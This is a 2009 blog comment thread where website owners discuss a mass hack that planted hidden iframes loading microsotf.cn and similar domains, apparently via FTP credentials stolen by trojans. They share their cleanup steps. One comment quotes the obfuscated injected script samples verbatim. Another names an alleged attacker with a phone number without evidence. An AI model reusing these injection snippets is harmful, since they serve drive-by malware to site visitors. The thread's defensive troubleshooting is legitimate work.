View Comments to “Web site hack loading microsotf.cn”

1. Matt Swanner on July 7th, 2009 10:03 am

   Little bastard crawled through my sites and hit most of them – sites spread across three servers. Makes me wonder what the endgame is – malware, fake traffic, etc…dicks.

   Thanks for the post.

2. Eddie H on July 8th, 2009 1:33 pm

   Mine too. I have restored my original index.html and index.php files, but a few hours later, the sites are hacked again. I have my files all set to 644, yet how are they continuing to hack in? Nasty bugger!

3. Darren on July 8th, 2009 7:57 pm

   I am having the same issue with our company site, is there a permanent fix for this?

4. Randy on July 9th, 2009 12:18 am

   Seems to be originating from the Academy of Sciences, Federation of Russia Their equivalent to our ITT Tech) using their campus servers in Kazakstan and Latvia before running through the European Union then jumping the Atlantic to here. The student is Nevdomskiy Alexey Alexeevich and can be reached at +79024883214

5. Randy on July 9th, 2009 12:23 am

   The safe side is to block all their servers from 91.212.*.*, unless of course you do regular business with the russian students' bots. ;-)

6. Matt Swanner on July 9th, 2009 12:44 pm

   if you have a server admininstrator contact them. If you're on a shared hosting plan, contact them, and click the link below for a tutorial on blocking IPs using htaccess.

   http://www.clockwatchers.com/htaccess_block.html

7. acenterprise on July 11th, 2009 8:58 am

   http://rockymountainenvironmental.com/
   07/04/09 — 8:16am
   Altered files: index.htm, index.html, default.asp, main.html
   Offending Code: <script>document.write(“<if”+''+'ra'+''+”m”+'e s'+”rc=”h”+''+'tt'+”p:”+''+”/”+''+'/mic'+”roso”+'t'+''+'f.c'+”n”+'/'+”" wid”+''+'th=1 he'+”igh”+''+'t'+”=”+”2>');</script><script>document.write(“<if”+'ra'+”m”+'e s'+”rc=”h”+'tt'+”p:”+''+”/”+'/mic'+”roso”+'t'+'f.c'+”n”+'/'+”" wid”+'th=1 he'+”igh”+'t'+”=”+”2>');</script><script>document.write(“<”+”i”+”f”+”ram”+”e sr”+”c=”h”+”t”+”tp”+”:”+”/”+”/tr”+”ught”+”"+”s”+”a.c”+”o”+”m/” wid”+”th=1 he”+”ight”+”=”+”2></if”+”r”+”a”+”"+”me>”);</script>
   The Script failed to redirect due to conflict between my script call and my arguments. Repaired files 07/06/09 after discovery.

   07/09/09 — 6:11AM
   NEW OFFENDING CODE
   <script>eval(“d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&]('(&@)&]</((*)&!i$[[^@&f((*)&!r$^!%a$^!%m((*)&!e>'$^!%)$[[^@&;[@&%^".replace(/(&@)&]|$^!%|((*)&!|$[[^@&|[@&%^/ig, ""))</script>
   This redirect bypassed my script calls and proceeded to download malware.
   Malware: [braviax (fakealeart Trojan)]& [ID12 Undetermined self replicating virus]
   I have closed down any server-side includes that are not necessary, changed passwords, and contacted Web.com to block IP as I as a client don't have access or admin rights to .htaccess. Best of luck to all.
   (Allen)

8. flandercan on July 12th, 2009 6:26 am

   Hi,

   I run a number of servers and only found this hack on an SMF forum on one of the accounts. The files are being changed using FTP I have lots of evidence in my logs,

   Im using Ubuntu servers and used the following command to find all the altered files,

   > grep -r kPvOkYUlTEBvLmAPjYUP *

   Also used iptables to block the IP's seen in logs (Yes more than one)

   258 iptables -A INPUT -m iprange –src-range 91.212.198.0-91.212.198.255 -j DROP
   259 iptables -A INPUT -m iprange –src-range 68.161.24.0-68.161.24.255 -j DROP
   260 iptables -A INPUT -m iprange –src-range 91.212.19.0-91.212.19.255 -j DROP

   91.212.198.x – Goes back to a linux or unix boxs
   68.161.247.75 – Goes back to a MS2003 Small business server (And looks like its owned by http://www.euromediapartners.co.uk) although their web server is on a different ddress.

   I found the hack in index.php, main.php, index.html and login.php

   FTP log shows these ips attacking a specific account to get the password then over approx 1 week accessing the site every day at different times.

   Thanks
   Paul Flanders
   http://www.fcconsultancy.co.uk

9. Name on July 12th, 2009 6:37 pm

   Shouldn't that first iptables line be:-

   iptables -A INPUT -m iprange –src-range 68.161.247.0-68.161.247.255 -j DROP

   ?

10. Name on July 12th, 2009 6:38 pm

    D'Oh! I meant second line, sorry :blush:

11. Dan on July 13th, 2009 9:24 pm

    This hit all 3 of my sites and has been driving me nuts to clear. I used cpanel to deny IP's to the ones you listed and I have taken out that awesome script from my index.php files and hopefully it is gone forever!

12. Name on July 13th, 2009 10:43 pm

    Just pulled the latest code from a site which contains updatedate.cn which is live and waiting with an empty site.

13. C4talyst on July 14th, 2009 8:41 am

    Blocking ip's is worthless at stopping this…CHANGE YOUR FTP PASSWORDS. Better yet, stop using http://ftp…use sftp.

14. Name on July 15th, 2009 12:34 pm

    This malware affected each website I worked on during the last week. Sites I didn't update were not affected. I replaced all the affected index files last night and continue to monitor the index date-stamps via FTP.

    I found this morning that the bugger re-infected 2 of 4 previously infected sites. The script was re-introduced to the 2 websites where I *did not* yet change the password. Now I've changed the FTP password on those as well; hopefully it's done!!!

15. Phil on July 16th, 2009 6:12 pm

    Who here is using Filezilla and got this hack? Raise your hand.

    *Raises hand* ..

    here's a post I made on another blog:

    Ok, about 8 of my websites were hit by this microsotf.cn iFrame script. And here’s the really troubling part: the code was inserted not just into index.php files, but also into TEMPLATE files located in a separate (non browsable) directory. Could be because the affected template files are called main.html, so some automated process thought it was an index equivalent, but much more lamely it could mean that there is live (human) intervention into the code-installation process.

    I fixed all of the files, reset my ftp password, and have had two of my sites re-hacked since then.

    This is the first I’ve heard about the possibility of FTP password files being compromised by malware or what-have-you, so I will try deleting all those saved passwords, resetting passwords on the server side (again), and maybe even switching ftp clients (right now I use Filezilla).

    Just out of curiosity, WHO HERE IS USING FILEZILLA AND HAS BEEN HACKED? Raise your hand!

    *Raises hand*

    There’s gotta be some pattern.

    -Phil

16. edrabbit on July 16th, 2009 6:23 pm

    I was using Filezilla on the machine that was compromised. This is definitely one of the targeted FTP clients.

17. Name on July 23rd, 2009 7:06 pm

    What exactly is causing this? Some douchebag modified index files in 6 of our sites, logging into FTP with the correct password for EACH site. Each site uses a different, completely random password.

18. JR on July 25th, 2009 12:21 pm

    I got hacked around the 13th. They entered and put the code in the index file of one site, though they got into a second account and did not change the code. I was using Filezilla at the time and didn't have wordpress updated to the latest edition.

    I went ahead and blocked IPs, but was wondering if any of the earlier posters have had any success in getting rid of these SOBs via password changes, shift to SFTP etc.
    Thanks in advance for any help

19. Name on July 25th, 2009 4:50 pm

    I posted the reply two above this one. I found the solution. What happens is you get a virus, and it steals your Filezilla history file. I have 4 computers, and around 10 ftp accounts on differnt domains/servers. We had 4 sites hit on personal server, and on my work server 2 accounts where hit. I was the only one that logged into those sites. On my computers only 1 had logged into the 2 work ftp accounts. Thatc omputer was compromised. I did a virus scan and came up with nothing in AVG, however, I rescanned with NOD32 and it discovered a fin Sheur2 Trojan.

    That trojan I have linked to the stolen Filezilla file. I have since formated that computer, and all is well. Make sure you change all FTPs AFTER removing the virus. But thats the easiest way to determine which PC was hit if you have multiple, match the access log to the Filezilla history.

20. Dan on July 25th, 2009 5:19 pm

    Does anyone have LiberKey installed on a pen drive??? That;s where i found some viruses and trojan horses including the one mentioned above.

21. brainasium on July 25th, 2009 9:18 pm

    Appears that there is a variant updatedate.cn. I have cleaned up my files 4 times already. Changed ftp passwords. Changed root password Unfortunately I cannot use SFTP cause the damn host doesnt support it. Chrome and Firefox continue to give Malware warnings on exploited pages. Terrible for business.

22. brainasium on July 25th, 2009 9:20 pm

    @Name. I used WS-FTP and still got the problem. I don't believe its just a FileZilla problem.

23. JR on July 26th, 2009 11:14 am

    Where have you guys found infections? I only found the code on the index file of the main site. Did anyone find hidden snippets in wordpress files or any database intrusions? Also, from my FTP logs, it only looks like they were signed in briefly. It appeared the index file was the only one pulled.

    Lastly, if a trojan is found, do you have to reformat the comp or just pull the infection?

24. Dan on July 26th, 2009 3:04 pm

    They changed my index.php file as well as adding some subdirectories that looked like they should exist. Things like /language and /js were showing up as sub folders with a bunch of crap that they shouldn't have.

    I would suggest upgrading your wordpress install and then deleting everything from the directory trees and files that do not have a modified date of the day you ran the update. Save a few files like the wp-config.php and your upload directory.

    I had to do that a few times to catch everything along with change my FTP passwords on all my sites and then I blocked specific IP addresses that were generating bad traffic to my site. I then had to manually edit all the index.php files and remove the extra script tags it added to the bottoms of each page. After all that finally it has been 3 weeks and I think I might be free!

25. JR on July 26th, 2009 6:45 pm

    ace,

    have you had any problems after removing the trojans? What did you do to clear your computer?

    Also, have you switched from unsecure FTP to SFTP, changed computers, etc?

26. Nick on July 26th, 2009 6:54 pm

    This spyware affects all files that have common filenames.

    index, main, default, home, and more I assume.

    I use globalscape cuteftp and all of my sites that I access on a normal basis were infected.

    Some sites were crawled by google and categorized as malicious.

    Even some sites that I did not access recently were infected.

    I have to assume that it is a spyware that reads FTP logs/saved passwords on your computer, then later on FTPs in with admin access and overwrites a bunch of files.

    Clean PC.
    Change FTP passwords.
    Re-upload indexes.

27. JR on July 26th, 2009 10:08 pm

    Nick,

    Did you find a specific virus or trojan on your computer? Trying to figure out if more than my FTP was compromised. I had the updatedate .cn code on one index, but they entered into at least one other site which I can't find any changes on. It had hackersafe running on it, not sure if that was a deterrant or not, but they did avoid those sites.

28. Nick on July 27th, 2009 12:36 am

    Spybot was unable to find and remove it.

    I fixed it by doing a system restore and THEN a scan. It found a lot of stuff, but as usual, most of it is weird cookie stuff so I didn't pay attention to any specifics.

    I manually deleted a few files in the system32 directory.

    When I was infected, I had all sorts of problems, including a new desktop background saying I was infected. All these issues were rectified by system restore.

    I would just check all files that have index* in their name and see if anything was changed. Or, do a search on your server for files changed within certain dates.

    I have a theory, that it disguises itself as an adobe update or a java update, one of those.

29. JR on July 27th, 2009 11:45 am

    Okay, I've run just about every spyware program around and found a few infections on my main computer.

    However, I also noticed that one site I had connected to using SFTP was not effected while the ones I used Filezilla or dreamweaver (with FTP) were effected.

    Have switched to SFTP on everything and am keeping fingers crossed. Hope this helps anyone with the problem and would appreciate hearing more from people who have fixed the issue. From the number of posters that have stopped posting, it looks like they may have fixed this.

30. ET on July 28th, 2009 9:48 pm

    Some of my Web clients got infected so I had them all change their passwords. I use Filezilla to FTP. I thought that the common denominator was Filezilla but other posters FTP'd using other programs. I had my web client change her password and I never found out what she changed it to and have not FTP'd her files since the new password and she got hacked again. So we do know that changing passwords doesn't work. But someone wrote and said you must get the virus out of your computer first before you deal with changing passwords. According to the above post, is this the virus?: fin Sheur2 Trojan. Should I stop using Filezilla and instead use Dreamweaver to FTP?

31. cindy on July 29th, 2009 1:04 pm

    Hi, I posted 2 weeks ago and I'm checking in to see what problems are still circling, or if there are new variants of the updatedate.cn. My websites that were infected were the ones to which I had recently uploaded changes. Other sites were not compromised if I hadn't touched them. I'm using Dreamweaver FTP.

    I also somehow had a backdoor setup/ trojan downloader, the fake security alert problem, and finally, porn sites popping open on my machine. It was horrible. My other machine got infected from visiting a site that had the sheur virus and it was nasty to get rid of it. I think I got every bad hack within the 2-week period beginning July 3.

    So far, with the changed passwords on all FTP accounts, the sites are fine. It's been 2 weeks. I still check them all nervously though.

32. JR on July 29th, 2009 1:13 pm

    I've been okay for a few days. Still nervous. Spent about 60 hours running every AV and Spyware detector. Changed from Filezilla to SFTP, changed all passwords, etc.

    Been pulling FTP access records and they show the attackers trying, but failing to get in. Clearly looks like robots, as they are very quick repeat attempts.

    Aside from websites, did anyone else have personal/banking compromised? Or were the websites the only issue. Still freaking out a bit.

33. Spencer on July 30th, 2009 5:05 am

    This has happened a few times on my sites, and have had a read through your comments.

    I have not used Filezilla, only used Dreamweaver's built in FTP program. It has attached my ASP and PHP files, and now links to http://vipprojects.cn.

    The hosting company says its down to script vulnerabilities in my site. Any suggestions, as this seems like something that doesn't want to go away!

34. Oliver on August 1st, 2009 1:39 pm

    I removed all FTP access from my site and the problem is solved. This is fine with me as nobody needs FTP for my site. Unfortunately for some of you, this isn't the case but it seems this is definitely an FTP issue.

35. Oliver on August 1st, 2009 1:41 pm

    Forgot to mention that alot of these attacks are from China

36. ET on August 2nd, 2009 3:46 am

    My client needs her site fixed and I can not figure out how this hacker is getting in. Her site is plain html and I'm using Filezilla. AVG and Malwarebytes are not finding it. Now google is saying this when you type in her site in google “this site my harm your computer”. This is just aweful. Now I have to deal with google. I've had her change her password and I stopped ftping her index page for a week but the hack keeps coming back. I also learned today to set permissions in Filezilla by right clicking on the index page but I don't know if that will work yet. I also blocked IP addresses today (91.212.198.37, correct)? I also talked with her hosting for a long time and they told me to go to safeweb.norton.com and enter microsotf.cn to see what comes up and I did that and 2 viruses were listed but that doesn't help me. Is the only way to solve this by switching to SFTP? How do you even do that? Should I do a system restore? Is there anyone who can answer my questions?

37. Oliver on August 2nd, 2009 8:40 am

    The only way I have found to stop this is to disable all FTP accounts. That has solved all my problems but again, I am sure this is not an option for most of you. Sorry

38. ET on August 2nd, 2009 2:49 pm

    Oliver,
    How did you disable your FTP accounts? Within the CPanel of the hosts?

39. Oliver on August 2nd, 2009 3:30 pm

    Actually I disabled anonymous FTP and deleted an FTP account of one of my admins. Checking through the logs, I found that his account was the one that had been used to access the server files so it is quite possible that his computer had been compromised. I did all these actions through the hosts Cpanel.

40. Oliver on August 2nd, 2009 3:35 pm

    Day 2 and site is still untouched even though I see many hits from IP's in China, Russia, Kazakhstan, Norway and many others. Fingers are crossed and I get nervous every time I click on my site.

41. ET on August 3rd, 2009 1:31 pm

    Oliver,
    Thank you for your answer. I will take those steps. I get so nervous too. My heart drops when I see that stupid script in my client's index pages.

42. ET on August 3rd, 2009 2:05 pm

    In repsonse to this: “I found that his account was the one that had been used to access the server files so it is quite possible that his computer had been compromised.” Does that mean that your client now has this virus and he needs to take all the measures you did to secure his computer and/or site?

43. Oliver on August 3rd, 2009 5:24 pm

    The site is actually mine and it is a Vbulletin site. There is no virus anywhere because the script was supposed to redirect anyone that clicked on it to another site with the virus on it. Unfortunately for whoever wrote the code, Vbulletin only interpreted it as a Parse error and would show you which file the error was on and which line of code.
    This is what shows up as the error where ** is my site directory:

    *Parse error*: syntax error, unexpected ';', expecting T_VARIABLE or '$' in* /**/**/**/showthread.php* on line* 352*

44. Oliver on August 3rd, 2009 5:25 pm

    Day 3 and still untouched

45. Oliver on August 4th, 2009 7:05 pm

    Day 4 and still clean…I think my solution worked :)

46. ET on August 5th, 2009 2:02 pm

    Day 4 for me too
    setting permissions in Filezilla (index pages now 644), cleaning out the bad script in index pages, blocking IP, updating Adobe Acrobat Reader, changing passwords (although that didn't work in the past), disabling anonymous FTP in CPanel for Bluehost clients, doing scans with AGV and Malwarebytes (scanning never found anything in the past though), turning “register_globals” to “Off” in my php.ini file for my online store–I think those are all the steps I took. One step I didn't take yet but will is to update Cubecart for my online store. Not many people are posting anymore so I wonder if this hacker is busted.

47. Oliver on August 6th, 2009 10:05 pm

    Day 5 and I think I am in the clear :) :) :)

48. ET on August 8th, 2009 7:23 am

    I’m in the clear too so far.

49. ET on August 8th, 2009 3:23 am

    I'm in the clear too so far.

Leave a Reply